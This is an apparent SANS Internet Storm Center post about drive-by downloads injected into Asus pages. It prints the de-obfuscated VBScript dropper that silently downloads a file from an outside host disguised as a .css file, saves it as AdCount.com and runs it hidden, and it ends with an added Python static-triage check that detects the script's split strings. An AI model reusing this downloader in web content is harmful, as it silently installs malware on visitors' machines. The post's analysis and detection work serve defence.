
SANS ISC: Virus spreads from Asus Server - SANS Internet Storm Center SANS ISC InfoSec Forums


Virus spreads from Asus Server
Robert has shared with us a report of drive-by downloads injected into Asus pages:
http://www.heise-security.co.uk/news/82643

This is definitely not the first such case. Websites that are not secure are a favourite platform for attackers to launch attacks from.

Our handler Lenny has de-obfuscated the VBScript that triggered the download:

<html>
   <script language="VBScript">
   on error resume next
   ' Several names are split into fragments and joined at run time, so the
   ' full CLSID and ProgIDs never appear as literals in the page source.
   clID1  = "clsi"
   clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
   XML1 = "Mic"
   XML2 = "rosoft.XMLHTTP"
   AdoSqa1 = "Adodb.S"
   AdoSqa2 = "tream"
   oGet   = "GET"
   fname1 = "AdCount.com"
   SFO    = "Scripting.FileSystemObject"
   SApp   = "Shell.Application"
   dl     = "http://www.yyc8.com/script/src/rss3.css"
   ' Build an <object> with the joined classid and use it to create the helpers
   Set df = document.createElement("object")
   df.setAttribute "classid", clID1&clID2
   Set x  =  df.CreateObject(XML1&XML2,"")
   set S  =  df.createobject(AdoSqa1&AdoSqa2,"")
   S.type = 1
   ' Fetch the payload synchronously
   x.Open oGet, dl, False
   x.Send
   ' GetSpecialFolder(2) is the temporary folder; the response is saved there
   set F   = df.createobject(SFO,"")
   set tmp = F.GetSpecialFolder(2)
   fname1  = F.BuildPath(tmp,fname1)
   S.open
   S.write x.responseBody
   S.savetofile fname1,2
   S.close
   ' Run the saved file with a hidden window
   set Q  = df.createobject(SApp,"")
   Q.ShellExecute fname1,"","","open",0
   </script>
   <head>
   <title>Internet Explorer</title>
   </head><body></body>
</html>

Koon Yaw
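
A static triage check for the string splitting seen in the script above, as an added example that is not part of the original diary: it folds the `&` concatenations back together and then looks for the object names the sample relies on. The sample text is a constructed excerpt of that script, and the function and indicator names are illustrative.

```python
import re

# Constructed sample: shortened excerpt of the de-obfuscated script above.
SAMPLE = '''
clID1  = "clsi"
clID2  = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
SApp   = "Shell.Application"
df.setAttribute "classid", clID1&clID2
Set x  =  df.CreateObject(XML1&XML2,"")
set S  =  df.createobject(AdoSqa1&AdoSqa2,"")
S.savetofile fname1,2
set Q  = df.createobject(SApp,"")
Q.ShellExecute fname1,"","","open",0
'''

# Indicator names are illustrative; the needles are the strings the sample builds.
INDICATORS = {
    "rds_dataspace_clsid": "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36",
    "xmlhttp": "microsoft.xmlhttp",
    "adodb_stream": "adodb.stream",
    "shell_application": "shell.application",
}

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)  # name = "literal"
TERM = r'(?:"[^"]*"|\w+)'                                    # literal or variable
CONCAT = re.compile(rf'{TERM}(?:\s*&\s*{TERM})+')            # a & b & ...

def fold_strings(script):
    """Return the literal assignments plus every '&' chain that fully resolves."""
    consts = {name.lower(): val for name, val in ASSIGN.findall(script)}
    built = list(consts.values())
    for m in CONCAT.finditer(script):
        parts = re.split(r'\s*&\s*', m.group(0))
        # VBScript identifiers are case-insensitive, hence the lower().
        vals = [p[1:-1] if p.startswith('"') else consts.get(p.lower()) for p in parts]
        if None not in vals:            # skip chains with unknown variables
            built.append("".join(vals))
    return built

def triage(script):
    """Names of the indicators found after folding, sorted."""
    strings = [s.lower() for s in fold_strings(script)]
    return sorted(k for k, needle in INDICATORS.items()
                  if any(needle in s for s in strings))
```

A plain substring search over the raw text finds only `Shell.Application` here; the other three indicators appear only after folding.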
